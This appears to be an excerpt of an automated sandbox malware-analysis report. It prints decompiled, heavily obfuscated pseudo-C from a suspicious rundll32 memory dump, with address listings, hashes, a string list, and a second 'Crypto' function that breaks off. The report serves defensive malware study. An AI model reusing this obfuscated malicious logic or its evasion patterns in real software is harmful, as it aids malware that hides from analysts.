				_v160 = _v160 ^ 0x0009a8dc;
				_v272 = 0x9202;
				_v272 = _v272 | 0xfb135803;
				_t606 = 0x41;
				_v272 = _v272 * 0x2c;
				_v272 = _v272 << 1;
				_v272 = _v272 ^ 0x4ed07035;
				_v100 = 0x536289;
				_v100 = _v100 << 9;
				_v100 = _v100 ^ 0xa6cd28cf;
				_v108 = 0xf021d8;
				_v108 = _v108 ^ 0x8f8b6ed2;
				_v108 = _v108 ^ 0x8f701d8c;
				_v152 = 0xcba027;
				_v152 = _v152 ^ 0xce0cd109;
				_v152 = _v152 | 0x7dfb06f6;
				_v152 = _v152 ^ 0xfff88f5e;
				_v252 = 0xf09c41;
				_v252 = _v252 + 0x8e2a;
				_v252 = _v252 << 3;
				_v252 = _v252 | 0xdb831f2c;
				_v252 = _v252 ^ 0xdf846234;
				_v260 = 0x3d692f;
				_v260 = _v260 << 2;
				_v260 = _v260 | 0xbfb4a027;
				_v260 = _v260 + 0x643;
				_v260 = _v260 ^ 0xbffb0fde;
				_v92 = 0x80bca7;
				_v92 = _v92 >> 0xa;
				_v92 = _v92 ^ 0x00038c1c;
				_v228 = 0xbbbc43;
				_v228 = _v228 | 0x61282476;
				_v228 = _v228 + 0xffff6ee2;
				_v228 = _v228 * 0x69;
				_v228 = _v228 ^ 0x15ccd750;
				_v236 = 0xc2062f;
				_v236 = _v236 | 0xf7f3ef67;
				_v236 = _v236 * 0x5c;
				_v236 = _v236 ^ 0x1ba01eed;
				_v128 = 0xa773bc;
				_v128 = _v128 << 0x10;
				_v128 = _v128 | 0xe162daa5;
				_v128 = _v128 ^ 0xf3f36b57;
				_v136 = 0x3287f3;
				_v136 = _v136 / _t606;
				_v136 = _v136 >> 9;
				_v136 = _v136 ^ 0x000c37d1;
				_v104 = 0x8d5fef;
				_v104 = _v104 + 0xffff56ea;
				_v104 = _v104 ^ 0x008f942b;
				_v44 = 0xd6bac6;
				_v44 = _v44 * 0x7f;
				_v44 = _v44 ^ 0x6a80c639;
				_v148 = 0xa4165e;
				_v148 = _v148 * 0x13;
				_v148 = _v148 | 0x84e82f79;
				_v148 = _v148 ^ 0x8cef9599;
				_v96 = 0xfc4916;
				_v96 = _v96 + 0xffff0795;
				_v96 = _v96 ^ 0x00f5cebb;
				_v132 = 0xd5d7c2;
				_v132 = _v132 >> 0x10;
				_v132 = _v132 << 0xd;
				_v132 = _v132 ^ 0x0010cc3c;
				_v264 = 0xf6e8cb;
				_v264 = _v264 + 0x6576;
				_v264 = _v264 + 0x7b15;
				_v264 = _v264 + 0x6b9c;
				_v264 = _v264 ^ 0x00fe3ec7;
				_v208 = 0x3a8541;
				_v208 = _v208 | 0x57459f57;
				_v208 = _v208 ^ 0x66631a8c;
				_v208 = _v208 | 0x178bfabb;
				_v208 = _v208 ^ 0x379a2cb6;
				_v56 = 0x33c5e6;
				_v56 = _v56 + 0x441;
				_v56 = _v56 ^ 0x0035e6a0;
				_v172 = 0x2bd4df;
				_v172 = _v172 + 0xda1f;
				_v172 = _v172 + 0x8171;
				_v172 = _v172 ^ 0x002cd084;
				_v48 = 0x796d26;
				_v48 = _v48 + 0xffff3152;
				_v48 = _v48 ^ 0x00766b67;
				_v88 = 0xfc738c;
				_v88 = _v88 << 0xe;
				_v88 = _v88 ^ 0x1ce8da45;
				_v140 = 0x79fdd0;
				_v140 = _v140 >> 0xe;
				_v140 = _v140 * 0x78;
				_v140 = _v140 ^ 0x000f2c53;
				_v64 = 0xd0b1f6;
				_v64 = _v64 >> 9;
				_v64 = _v64 ^ 0x000411a2;
				_v200 = 0xaa2240;
				_v200 = _v200 | 0x35f3f2d4;
				_v200 = _v200 + 0x4147;
				_v200 = _v200 + 0xffff1702;
				_v200 = _v200 ^ 0x35f16a60;
				_v52 = 0x980f89;
				_v52 = _v52 ^ 0xc15a5b47;
				_v52 = _v52 ^ 0xc1c323e9;
				_v216 = 0xb7a8b5;
				_v216 = _v216 >> 3;
				_v216 = _v216 ^ 0xa2f7ad91;
				_v216 = _v216 + 0xfffff0a8;
				_v216 = _v216 ^ 0xa2ec62b8;
				_v72 = 0x73581d;
				_v72 = _v72 + 0xffffc838;
				_v72 = _v72 ^ 0x00777119;
				_v164 = 0x873053;
				_v164 = _v164 ^ 0xefe323e3;
				_v164 = _v164 | 0xd91bba05;
				_v164 = _v164 ^ 0xff705bac;
				_v40 = 0xf8d5df;
				_v40 = _v40 ^ 0x79f853d7;
				_v40 = _v40 ^ 0x79053437;
				_v192 = 0x180af0;
				_v192 = _v192 + 0xffff4c14;
				_v192 = _v192 << 8;
				_v192 = _v192 + 0x2aad;
				_v192 = _v192 ^ 0x175759c3;
				_v256 = 0x23b549;
				_v256 = _v256 + 0x5eb6;
				_v256 = _v256 | 0xffb7bbff;
				_v256 = _v256 ^ 0xffb807e9;
				_v176 = 0xc1fdd5;
				_v176 = _v176 >> 0xc;
				_v176 = _v176 | 0x5151af8d;
				_v176 = _v176 ^ 0x515c7a4b;
				_v112 = 0xec5780;
				_v112 = _v112 ^ 0x97b4c021;
				_v112 = _v112 ^ 0x9750bd7e;
				_v180 = 0x591b41;
				_v180 = _v180 + 0x207e;
				_v180 = _v180 + 0xffffc81d;
				_v180 = _v180 ^ 0x005ca8dc;
				_v68 = 0x76fd1d;
				_t675 = 0x5c52c4a;
				_v68 = _v68 | 0x9e2d4356;
				_v68 = _v68 ^ 0x9e728261;
				_v76 = 0xf22a3;
				_v76 = _v76 | 0x9c703035;
				_v76 = _v76 ^ 0x9c7b5f20;
				_v220 = 0x3decab;
				_v220 = _v220 << 8;
				_v220 = _v220 ^ 0x53082a5e;
				_v220 = _v220 >> 0xd;
				_v220 = _v220 ^ 0x0004d715;
				_v84 = 0x6eb476;
				_v84 = _v84 << 0xd;
				_v84 = _v84 ^ 0xd68135de;
				_v124 = 0x458e11;
				_v124 = _v124 | 0x336f5b57;
				_t607 = 0x43;
				_v124 = _v124 / _t607;
				_v124 = _v124 ^ 0x00c97d17;
				_v156 = 0x7cba2c;
				_t608 = 0x4b;
				_v156 = _v156 / _t608;
				_v156 = _v156 | 0x0b494d21;
				_v156 = _v156 ^ 0x0b48f5d9;
				_v36 = 0x519404;
				_v36 = _v36 << 8;
				_v36 = _v36 ^ 0x5195ba3f;
				_v168 = 0xf13e55;
				_v168 = _v168 | 0x95edbe5f;
				_v168 = _v168 ^ 0xd6548190;
				_v168 = _v168 ^ 0x43a3dbfd;
				_v188 = 0xdd4a71;
				_v188 = _v188 + 0xffff5bb0;
				_v188 = _v188 >> 0xb;
				_v188 = _v188 >> 6;
				_v188 = _v188 ^ 0x000a03ec;
				_v196 = 0x58b29f;
				_t609 = 0x22;
				_v196 = _v196 / _t609;
				_v196 = _v196 + 0xffff713e;
				_v196 = _v196 + 0xffff146a;
				_v196 = _v196 ^ 0x000c9f67;
				_v212 = 0xc056c;
				_t610 = 0x45;
				_v212 = _v212 * 0x51;
				_v212 = _v212 >> 0xc;
				_v212 = _v212 / _t610;
				_v212 = _v212 ^ 0x0007774b;
				while(1) {
					L1:
					_t566 = 0x6c6f684;
					while(1) {
						L2:
						_t611 = 0x92c3a26;
						while(1) {
							L3:
							do {
								while(1) {
									L4:
									_t685 = _t596 - _t675;
									if(_t685 > 0) {
										break;
									}
									if(_t685 == 0) {
										E002E6BC6(_v124, _v32, _v156);
										_t596 = 0x4bc1ff4;
										goto L1;
									} else {
										if(_t596 == 0x1d3710) {
											_t596 = 0x6d0da1a;
											continue;
										} else {
											if(_t596 == 0x19992af) {
												_push(_t611);
												_push(_t611);
												_t573 = E002D7FF2(_v16);
												__eflags = _t573;
												_v20 = _t573;
												_t660 = 0x19c2787;
												_t596 =  !=  ? 0x19c2787 : 0x87f6c1b;
												_t566 = 0x6c6f684;
												_t611 = 0x92c3a26;
												continue;
											} else {
												if(_t596 == _t660) {
													_t575 = E002E7B05(_v16,  &_v32, _v28, _v216, _v72, _v164, _v248, _v40, _v80, _t611, _v192, _v256, _v20);
													_t682 =  &(_t682[0xc]);
													__eflags = _t575 - _v240;
													_t611 = 0x92c3a26;
													_t566 = 0x6c6f684;
													_t596 =  ==  ? 0x92c3a26 : 0x4bc1ff4;
													goto L3;
												} else {
													if(_t596 == 0x489cb15) {
														_push(_v148);
														_push(_v44);
														_t577 = E002EDCF7(_v104, 0x2d18b4, __eflags);
														_pop(_t633);
														__eflags = E002F0B68(_t577,  &_v12, _v224, _v96, _t633,  &_v16, _v132, _v264, _v208, _v56, _v28, _v172) - _v116;
														_t596 =  ==  ? 0x19992af : 0x87f6c1b;
														E002DA8B0(_v48, _t577, _v88);
														_t677 = _v24;
														_t682 =  &(_t682[0xb]);
														L24:
														_t566 = 0x6c6f684;
														_t611 = 0x92c3a26;
														_t660 = 0x19c2787;
														goto L25;
													} else {
														if(_t596 != 0x4bc1ff4) {
															goto L25;
														} else {
															E002E8519(_v36, _v168, _v20);
															_t596 = 0x87f6c1b;
															while(1) {
																L1:
																_t566 = 0x6c6f684;
																L2:
																_t611 = 0x92c3a26;
																L3:
																goto L4;
															}
														}
													}
												}
											}
										}
									}
									L28:
									return _t680;
								}
								__eflags = _t596 - _t566;
								if(_t596 == _t566) {
									_t567 = E002E828A(_v68, _v76, _v220, _t677, _v120, 0x20, _v84, _v32);
									_t682 =  &(_t682[6]);
									_t596 = _t675;
									__eflags = _t567 - _v60;
									_t680 =  ==  ? 1 : _t680;
									goto L24;
								} else {
									__eflags = _t596 - 0x6d0da1a;
									if(__eflags == 0) {
										_push(_v272);
										_push(_v160);
										_t585 = E002EDCF7(_v268, 0x2d1884, __eflags);
										_push(_v152);
										_push(_v108);
										_t588 = E002D9462(_t585, _v260,  &_v28, E002EDCF7(_v100, 0x2d1814, __eflags), _v92, _v144);
										_t682 =  &(_t682[9]);
										__eflags = _t588 - _v244;
										_t596 =  ==  ? 0x489cb15 : 0x822e036;
										E002DA8B0(_v228, _t585, _v236);
										E002DA8B0(_v128, _t586, _v136);
										_t677 = _v24;
										_t675 = 0x5c52c4a;
										goto L24;
									} else {
										__eflags = _t596 - 0x87f6c1b;
										if(_t596 == 0x87f6c1b) {
											E002D957D(_v28, _v188, _v196, _v204, _v212);
										} else {
											__eflags = _t596 - _t611;
											if(_t596 != _t611) {
												goto L25;
											} else {
												_t594 = E002DA81D(_v32, _a4, _v176, _v112, _v232, _a20, _v180);
												_t682 =  &(_t682[5]);
												__eflags = _t594 - _v184;
												_t566 = 0x6c6f684;
												_t596 =  ==  ? 0x6c6f684 : _t675;
												goto L2;
											}
										}
									}
								}
								goto L28;
								L25:
								__eflags = _t596 - 0x822e036;
							} while (__eflags != 0);
							goto L28;
						}
					}
				}
			}

































































































                                                                                                                                  0x002eae77
                                                                                                                                  0x002eae7e
                                                                                                                                  0x002eae80
                                                                                                                                  0x002eae87
                                                                                                                                  0x002eae8e
                                                                                                                                  0x002eae90
                                                                                                                                  0x002eae97
                                                                                                                                  0x002eae9e
                                                                                                                                  0x002eae9f
                                                                                                                                  0x002eaea0
                                                                                                                                  0x002eaea5
                                                                                                                                  0x002eaeb0
                                                                                                                                  0x002eaeb2
                                                                                                                                  0x002eaeb9
                                                                                                                                  0x002eaebc
                                                                                                                                  0x002eaec9
                                                                                                                                  0x002eaed4
                                                                                                                                  0x002eaed9
                                                                                                                                  0x002eaee1
                                                                                                                                  0x002eaeec
                                                                                                                                  0x002eaefa
                                                                                                                                  0x002eaeff
                                                                                                                                  0x002eaf05
                                                                                                                                  0x002eaf0d
                                                                                                                                  0x002eaf12
                                                                                                                                  0x002eaf1a
                                                                                                                                  0x002eaf22
                                                                                                                                  0x002eaf2a
                                                                                                                                  0x002eaf37
                                                                                                                                  0x002eaf38
                                                                                                                                  0x002eaf3c
                                                                                                                                  0x002eaf44
                                                                                                                                  0x002eaf4f
                                                                                                                                  0x002eaf57
                                                                                                                                  0x002eaf62
                                                                                                                                  0x002eaf6a
                                                                                                                                  0x002eaf6f
                                                                                                                                  0x002eaf73
                                                                                                                                  0x002eaf7b
                                                                                                                                  0x002eaf83
                                                                                                                                  0x002eaf8b
                                                                                                                                  0x002eaf9e
                                                                                                                                  0x002eafa5
                                                                                                                                  0x002eafb0
                                                                                                                                  0x002eafb8
                                                                                                                                  0x002eafc0
                                                                                                                                  0x002eafc8
                                                                                                                                  0x002eafd0
                                                                                                                                  0x002eafd8
                                                                                                                                  0x002eafe0
                                                                                                                                  0x002eafe8
                                                                                                                                  0x002eaff0
                                                                                                                                  0x002eaff5
                                                                                                                                  0x002eaffd
                                                                                                                                  0x002eb00a
                                                                                                                                  0x002eb00e
                                                                                                                                  0x002eb013
                                                                                                                                  0x002eb01b
                                                                                                                                  0x002eb026
                                                                                                                                  0x002eb037
                                                                                                                                  0x002eb03e
                                                                                                                                  0x002eb049
                                                                                                                                  0x002eb054
                                                                                                                                  0x002eb05f
                                                                                                                                  0x002eb06a
                                                                                                                                  0x002eb072
                                                                                                                                  0x002eb077
                                                                                                                                  0x002eb07e
                                                                                                                                  0x002eb086
                                                                                                                                  0x002eb08e
                                                                                                                                  0x002eb096
                                                                                                                                  0x002eb09e
                                                                                                                                  0x002eb0ac
                                                                                                                                  0x002eb0b1
                                                                                                                                  0x002eb0b7
                                                                                                                                  0x002eb0bf
                                                                                                                                  0x002eb0ca
                                                                                                                                  0x002eb0d2
                                                                                                                                  0x002eb0da
                                                                                                                                  0x002eb0e5
                                                                                                                                  0x002eb0ed
                                                                                                                                  0x002eb0fa
                                                                                                                                  0x002eb0fb
                                                                                                                                  0x002eb0ff
                                                                                                                                  0x002eb103
                                                                                                                                  0x002eb10b
                                                                                                                                  0x002eb116
                                                                                                                                  0x002eb11e
                                                                                                                                  0x002eb129
                                                                                                                                  0x002eb134
                                                                                                                                  0x002eb13f
                                                                                                                                  0x002eb14a
                                                                                                                                  0x002eb155
                                                                                                                                  0x002eb160
                                                                                                                                  0x002eb16b
                                                                                                                                  0x002eb176
                                                                                                                                  0x002eb17e
                                                                                                                                  0x002eb186
                                                                                                                                  0x002eb18b
                                                                                                                                  0x002eb193
                                                                                                                                  0x002eb19b
                                                                                                                                  0x002eb1a3
                                                                                                                                  0x002eb1a8
                                                                                                                                  0x002eb1b0
                                                                                                                                  0x002eb1b8
                                                                                                                                  0x002eb1c0
                                                                                                                                  0x002eb1cb
                                                                                                                                  0x002eb1d3
                                                                                                                                  0x002eb1de
                                                                                                                                  0x002eb1e6
                                                                                                                                  0x002eb1ee
                                                                                                                                  0x002eb1fb
                                                                                                                                  0x002eb1ff
                                                                                                                                  0x002eb207
                                                                                                                                  0x002eb20f
                                                                                                                                  0x002eb21c
                                                                                                                                  0x002eb220
                                                                                                                                  0x002eb228
                                                                                                                                  0x002eb233
                                                                                                                                  0x002eb23b
                                                                                                                                  0x002eb246
                                                                                                                                  0x002eb251
                                                                                                                                  0x002eb265
                                                                                                                                  0x002eb26c
                                                                                                                                  0x002eb274
                                                                                                                                  0x002eb27f
                                                                                                                                  0x002eb28a
                                                                                                                                  0x002eb295
                                                                                                                                  0x002eb2a0
                                                                                                                                  0x002eb2b3
                                                                                                                                  0x002eb2ba
                                                                                                                                  0x002eb2c5
                                                                                                                                  0x002eb2d8
                                                                                                                                  0x002eb2df
                                                                                                                                  0x002eb2ea
                                                                                                                                  0x002eb2f5
                                                                                                                                  0x002eb300
                                                                                                                                  0x002eb30b
                                                                                                                                  0x002eb316
                                                                                                                                  0x002eb321
                                                                                                                                  0x002eb329
                                                                                                                                  0x002eb331
                                                                                                                                  0x002eb33c
                                                                                                                                  0x002eb344
                                                                                                                                  0x002eb34c
                                                                                                                                  0x002eb354
                                                                                                                                  0x002eb35c
                                                                                                                                  0x002eb364
                                                                                                                                  0x002eb36c
                                                                                                                                  0x002eb374
                                                                                                                                  0x002eb37c
                                                                                                                                  0x002eb384
                                                                                                                                  0x002eb38c
                                                                                                                                  0x002eb397
                                                                                                                                  0x002eb3a2
                                                                                                                                  0x002eb3ad
                                                                                                                                  0x002eb3b5
                                                                                                                                  0x002eb3bd
                                                                                                                                  0x002eb3c5
                                                                                                                                  0x002eb3cd
                                                                                                                                  0x002eb3d8
                                                                                                                                  0x002eb3e3
                                                                                                                                  0x002eb3ee
                                                                                                                                  0x002eb3f9
                                                                                                                                  0x002eb401
                                                                                                                                  0x002eb40c
                                                                                                                                  0x002eb417
                                                                                                                                  0x002eb427
                                                                                                                                  0x002eb42e
                                                                                                                                  0x002eb439
                                                                                                                                  0x002eb444
                                                                                                                                  0x002eb44c
                                                                                                                                  0x002eb457
                                                                                                                                  0x002eb45f
                                                                                                                                  0x002eb467
                                                                                                                                  0x002eb46f
                                                                                                                                  0x002eb477
                                                                                                                                  0x002eb47f
                                                                                                                                  0x002eb48a
                                                                                                                                  0x002eb495
                                                                                                                                  0x002eb4a0
                                                                                                                                  0x002eb4a8
                                                                                                                                  0x002eb4ad
                                                                                                                                  0x002eb4b5
                                                                                                                                  0x002eb4bd
                                                                                                                                  0x002eb4c5
                                                                                                                                  0x002eb4d0
                                                                                                                                  0x002eb4db
                                                                                                                                  0x002eb4e6
                                                                                                                                  0x002eb4ee
                                                                                                                                  0x002eb4f6
                                                                                                                                  0x002eb4fe
                                                                                                                                  0x002eb506
                                                                                                                                  0x002eb511
                                                                                                                                  0x002eb51c
                                                                                                                                  0x002eb527
                                                                                                                                  0x002eb52f
                                                                                                                                  0x002eb537
                                                                                                                                  0x002eb53c
                                                                                                                                  0x002eb544
                                                                                                                                  0x002eb54c
                                                                                                                                  0x002eb554
                                                                                                                                  0x002eb55c
                                                                                                                                  0x002eb564
                                                                                                                                  0x002eb56c
                                                                                                                                  0x002eb574
                                                                                                                                  0x002eb579
                                                                                                                                  0x002eb581
                                                                                                                                  0x002eb589
                                                                                                                                  0x002eb594
                                                                                                                                  0x002eb59f
                                                                                                                                  0x002eb5aa
                                                                                                                                  0x002eb5b2
                                                                                                                                  0x002eb5ba
                                                                                                                                  0x002eb5c2
                                                                                                                                  0x002eb5cc
                                                                                                                                  0x002eb5d7
                                                                                                                                  0x002eb5dc
                                                                                                                                  0x002eb5e7
                                                                                                                                  0x002eb5f2
                                                                                                                                  0x002eb5fd
                                                                                                                                  0x002eb608
                                                                                                                                  0x002eb613
                                                                                                                                  0x002eb61b
                                                                                                                                  0x002eb620
                                                                                                                                  0x002eb628
                                                                                                                                  0x002eb62d
                                                                                                                                  0x002eb635
                                                                                                                                  0x002eb640
                                                                                                                                  0x002eb648
                                                                                                                                  0x002eb653
                                                                                                                                  0x002eb65e
                                                                                                                                  0x002eb672
                                                                                                                                  0x002eb677
                                                                                                                                  0x002eb680
                                                                                                                                  0x002eb68b
                                                                                                                                  0x002eb69d
                                                                                                                                  0x002eb6a2
                                                                                                                                  0x002eb6ab
                                                                                                                                  0x002eb6b6
                                                                                                                                  0x002eb6c1
                                                                                                                                  0x002eb6cc
                                                                                                                                  0x002eb6d4
                                                                                                                                  0x002eb6df
                                                                                                                                  0x002eb6e7
                                                                                                                                  0x002eb6ef
                                                                                                                                  0x002eb6f7
                                                                                                                                  0x002eb6ff
                                                                                                                                  0x002eb707
                                                                                                                                  0x002eb70f
                                                                                                                                  0x002eb714
                                                                                                                                  0x002eb719
                                                                                                                                  0x002eb721
                                                                                                                                  0x002eb72d
                                                                                                                                  0x002eb732
                                                                                                                                  0x002eb738
                                                                                                                                  0x002eb740
                                                                                                                                  0x002eb748
                                                                                                                                  0x002eb750
                                                                                                                                  0x002eb75d
                                                                                                                                  0x002eb75e
                                                                                                                                  0x002eb762
                                                                                                                                  0x002eb76d
                                                                                                                                  0x002eb771
                                                                                                                                  0x002eb779
                                                                                                                                  0x002eb779
                                                                                                                                  0x002eb779
                                                                                                                                  0x002eb77e
                                                                                                                                  0x002eb77e
                                                                                                                                  0x002eb77e
                                                                                                                                  0x002eb783
                                                                                                                                  0x002eb783
                                                                                                                                  0x002eb788
                                                                                                                                  0x002eb788
                                                                                                                                  0x002eb788
                                                                                                                                  0x002eb788
                                                                                                                                  0x002eb78a
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x002eb790
                                                                                                                                  0x002eb969
                                                                                                                                  0x002eb96f
                                                                                                                                  0x00000000
                                                                                                                                  0x002eb796
                                                                                                                                  0x002eb79c
                                                                                                                                  0x002eb94a
                                                                                                                                  0x00000000
                                                                                                                                  0x002eb7a2
                                                                                                                                  0x002eb7a8
                                                                                                                                  0x002eb91c
                                                                                                                                  0x002eb91d
                                                                                                                                  0x002eb91e
                                                                                                                                  0x002eb924
                                                                                                                                  0x002eb926
                                                                                                                                  0x002eb933
                                                                                                                                  0x002eb938
                                                                                                                                  0x002eb93b
                                                                                                                                  0x002eb940
                                                                                                                                  0x00000000
                                                                                                                                  0x002eb7ae
                                                                                                                                  0x002eb7b0
                                                                                                                                  0x002eb8dc
                                                                                                                                  0x002eb8e3
                                                                                                                                  0x002eb8ef
                                                                                                                                  0x002eb8f1
                                                                                                                                  0x002eb8f6
                                                                                                                                  0x002eb8fb
                                                                                                                                  0x00000000
                                                                                                                                  0x002eb7b6
                                                                                                                                  0x002eb7bc
                                                                                                                                  0x002eb7e9
                                                                                                                                  0x002eb7f5
                                                                                                                                  0x002eb803
                                                                                                                                  0x002eb809
                                                                                                                                  0x002eb866
                                                                                                                                  0x002eb874
                                                                                                                                  0x002eb877
                                                                                                                                  0x002eb87c
                                                                                                                                  0x002eb883
                                                                                                                                  0x002ebada
                                                                                                                                  0x002ebada
                                                                                                                                  0x002ebadf
                                                                                                                                  0x002ebae4
                                                                                                                                  0x00000000
                                                                                                                                  0x002eb7be
                                                                                                                                  0x002eb7c4
                                                                                                                                  0x00000000
                                                                                                                                  0x002eb7ca
                                                                                                                                  0x002eb7dc
                                                                                                                                  0x002eb7e2
                                                                                                                                  0x002eb779
                                                                                                                                  0x002eb779
                                                                                                                                  0x002eb779
                                                                                                                                  0x002eb77e
                                                                                                                                  0x002eb77e
                                                                                                                                  0x002eb783
                                                                                                                                  0x00000000
                                                                                                                                  0x002eb783
                                                                                                                                  0x002eb779
                                                                                                                                  0x002eb7c4
                                                                                                                                  0x002eb7bc
                                                                                                                                  0x002eb7b0
                                                                                                                                  0x002eb7a8
                                                                                                                                  0x002eb79c
                                                                                                                                  0x002ebb18
                                                                                                                                  0x002ebb22
                                                                                                                                  0x002ebb22
                                                                                                                                  0x002eb979
                                                                                                                                  0x002eb97b
                                                                                                                                  0x002ebabf
                                                                                                                                  0x002ebad0
                                                                                                                                  0x002ebad3
                                                                                                                                  0x002ebad5
                                                                                                                                  0x002ebad7
                                                                                                                                  0x00000000
                                                                                                                                  0x002eb981
                                                                                                                                  0x002eb981
                                                                                                                                  0x002eb987
                                                                                                                                  0x002eb9e7
                                                                                                                                  0x002eb9f0
                                                                                                                                  0x002eb9fb
                                                                                                                                  0x002eba00
                                                                                                                                  0x002eba0e
                                                                                                                                  0x002eba44
                                                                                                                                  0x002eba4b
                                                                                                                                  0x002eba57
                                                                                                                                  0x002eba68
                                                                                                                                  0x002eba6b
                                                                                                                                  0x002eba81
                                                                                                                                  0x002eba86
                                                                                                                                  0x002eba8d
                                                                                                                                  0x00000000
                                                                                                                                  0x002eb989
                                                                                                                                  0x002eb989
                                                                                                                                  0x002eb98f
                                                                                                                                  0x002ebb0e
                                                                                                                                  0x002eb995
                                                                                                                                  0x002eb995
                                                                                                                                  0x002eb997
                                                                                                                                  0x00000000
                                                                                                                                  0x002eb99d
                                                                                                                                  0x002eb9c8
                                                                                                                                  0x002eb9cf
                                                                                                                                  0x002eb9d8
                                                                                                                                  0x002eb9da
                                                                                                                                  0x002eb9df
                                                                                                                                  0x00000000
                                                                                                                                  0x002eb9df
                                                                                                                                  0x002eb997
                                                                                                                                  0x002eb98f
                                                                                                                                  0x002eb987
                                                                                                                                  0x00000000
                                                                                                                                  0x002ebae9
                                                                                                                                  0x002ebae9
                                                                                                                                  0x002ebae9
                                                                                                                                  0x00000000
                                                                                                                                  0x002ebaf5
                                                                                                                                  0x002eb783
                                                                                                                                  0x002eb77e

                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000009.00000002.451115709.00000000002D1000.00000020.00000800.00020000.00000000.sdmp, Offset: 002D0000, based on PE: true
                                                                                                                                  • Associated: 00000009.00000002.451090160.00000000002D0000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000009.00000002.451178530.00000000002F3000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_9_2_2d0000_rundll32.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID: &:,$&:,$&:,$&:,$/i=$GA$Kz\Q$W[o3$_}+$gkv$v$(a$ve$~ $#$1P
                                                                                                                                  • API String ID: 0-1587349264
                                                                                                                                  • Opcode ID: 18672aa2e2c33685030934cfb70e6880cd27c55dab882bca37edcc1de2c856a5
                                                                                                                                  • Instruction ID: e3cc294e6d28af0f61ba86692ee3c2091b6141f856d3e2a618817495a2afe74a
                                                                                                                                  • Opcode Fuzzy Hash: 18672aa2e2c33685030934cfb70e6880cd27c55dab882bca37edcc1de2c856a5
                                                                                                                                  • Instruction Fuzzy Hash: 845221711093809FD7B9CF61C48AB8BBBE1BBC4308F50891DE6DA86261D7B18959CF53
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 002E5CC4 Relevance: 16.7, Strings: 13, Instructions: 434COMMONCrypto
                                                                                                                                  Download Yara Rule
                                                                                                                                  C-Code - Quality: 88%
                                                                                                                                  			E002E5CC4() {
				char _v520;
				char _v1040;
				char _v1560;
				void* _v1572;
				intOrPtr _v1576;
				signed int _v1580;
				signed int _v1584;
				signed int _v1588;
				signed int _v1592;
				signed int _v1596;
				signed int _v1600;
				signed int _v1604;
				signed int _v1608;
				signed int _v1612;
				signed int _v1616;
				signed int _v1620;
				signed int _v1624;
				signed int _v1628;
				signed int _v1632;
				signed int _v1636;
				signed int _v1640;
				signed int _v1644;
				signed int _v1648;
				signed int _v1652;
				signed int _v1656;
				signed int _v1660;
				signed int _v1664;
				signed int _v1668;
				signed int _v1672;
				signed int _v1676;
				signed int _v1680;
				signed int _v1684;
				signed int _v1688;
				signed int _v1692;
				signed int _v1696;
				signed int _v1700;
				signed int _v1704;
				signed int _v1708;
				signed int _v1712;
				signed int _v1716;
				signed int _v1720;
				signed int _v1724;
				signed int _v1728;
				signed int _v1732;
				signed int _v1736;
				signed int _v1740;
				signed int _v1744;
				signed int _v1748;
				signed int _v1752;
				signed int _v1756;
				signed int _v1760;
				signed int _v1764;
				void* _t481;
				signed int _t496;
				void* _t499;
				intOrPtr _t503;
				void* _t539;
				signed int _t550;
				signed int _t551;
				signed int _t552;
				intOrPtr _t553;
				intOrPtr* _t554;
				signed int _t555;
				signed int _t556;
				signed int _t557;
				signed int _t558;
				signed int _t559;
				signed int _t560;
				signed int _t561;
				signed int _t562;
				signed int _t563;
				signed int _t564;
				signed int _t567;
				signed int* _t568;
				void* _t572;

				_t568 =  &_v1764;
				_v1576 = 0x9a4c1d;
				_v1596 = _v1596 & 0x00000000;
				asm("stosd");
				_t499 = 0x9b91574;
				asm("stosd");
				asm("stosd");
				_v1684 = 0xe59dc4;
				_v1684 = _v1684 | 0xd0a48cbc;
				_v1684 = _v1684 + 0xffff2e59;
				_v1684 = _v1684 ^ 0xd0e4cc7c;
				_v1752 = 0x51b4b3;
				_v1752 = _v1752 ^ 0x5d9a17a0;
				_t550 = 0xb;
				_t555 = 0x76;
				_v1752 = _v1752 * 0xb;
				_v1752 = _v1752 ^ 0x54bb96eb;
				_v1752 = _v1752 ^ 0x53749705;
				_v1632 = 0xaf6c30;
				_v1632 = _v1632 << 6;
				_v1632 = _v1632 ^ 0x2bdb0c02;
				_v1720 = 0x499d0c;
				_v1720 = _v1720 | 0xb1a117f5;
				_v1720 = _v1720 / _t550;
				_v1720 = _v1720 + 0x97c7;
				_v1720 = _v1720 ^ 0x102d1aad;
				_v1704 = 0xc8e3b3;
				_v1704 = _v1704 * 0x32;
				_v1704 = _v1704 ^ 0x0819b8db;
				_v1704 = _v1704 | 0x44ca091a;
				_v1704 = _v1704 ^ 0x6fefc93f;
				_v1668 = 0xa62014;
				_v1668 = _v1668 | 0xeabb5dd4;
				_v1668 = _v1668 * 0x68;
				_v1668 = _v1668 ^ 0x5dcb1e30;
				_v1744 = 0xf6f234;
				_v1744 = _v1744 * 0x2a;
				_v1744 = _v1744 ^ 0x80b741fb;
				_v1744 = _v1744 / _t555;
				_v1744 = _v1744 ^ 0x0165dd5f;
				_v1584 = 0x312e96;
				_v1584 = _v1584 + 0xffff2d5f;
				_v1584 = _v1584 ^ 0x003c0d9d;
				_v1712 = 0xa058cf;
				_v1712 = _v1712 << 0xd;
				_v1712 = _v1712 >> 8;
				_t556 = 0x70;
				_v1712 = _v1712 / _t556;
				_v1712 = _v1712 ^ 0x000e60b1;
				_v1624 = 0xe892f9;
				_v1624 = _v1624 | 0x8c579b60;
				_v1624 = _v1624 ^ 0x8cfff2b4;
				_v1616 = 0xaf548d;
				_v1616 = _v1616 << 0xe;
				_v1616 = _v1616 ^ 0xd52eab36;
				_v1732 = 0xb05ea2;
				_v1732 = _v1732 * 0x22;
				_t557 = 0x7e;
				_v1732 = _v1732 / _t557;
				_t558 = 0x6e;
				_v1732 = _v1732 / _t558;
				_v1732 = _v1732 ^ 0x000d3439;
				_v1592 = 0x913a71;
				_v1592 = _v1592 + 0xffff7440;
				_v1592 = _v1592 ^ 0x0095b07c;
				_v1696 = 0x599322;
				_v1696 = _v1696 / _t550;
